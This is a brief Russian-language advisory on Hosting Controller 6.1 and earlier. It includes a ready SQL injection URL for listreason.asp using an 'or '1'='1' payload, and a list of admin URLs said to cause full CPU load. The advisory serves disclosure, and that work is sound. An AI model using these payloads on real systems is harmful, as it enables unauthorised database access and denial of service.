Xakep #305. Многошаговые SQL-инъекции
Программа: Hosting Controller 6.1 HotFix 2.1 и более ранние версии
Уязвимость позволяет удаленному авторизованному пользователю выполнить произвольные SQL команды в базе данных приложения и вызвать отказ в обслуживании системы.
Уязвимость существует из-за недостаточной обработки входных данных в сценарии 'listreason.asp'. Удаленный авторизованный пользователь может выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[target]/admin/accounts/listreason.asp? ListReaso n=tester'%20or%20'1'='1
Удаленный авторизованный пользователь может с помощью специально сформированного URL вызвать 100% загрузку процессора.
Пример:
http://[target]/admin/hosting/editplanopt3.asp
http://[target]/admin/AdminSettings/ plansettings.asp?action=1
http://[target]/admin/ hosting/planmanager.asp? action=3&planid=2
http://[target]/admin/hosting/planmanager.asp
http://[target]/admin/hosting/planmanager.asp? action=3&planid=1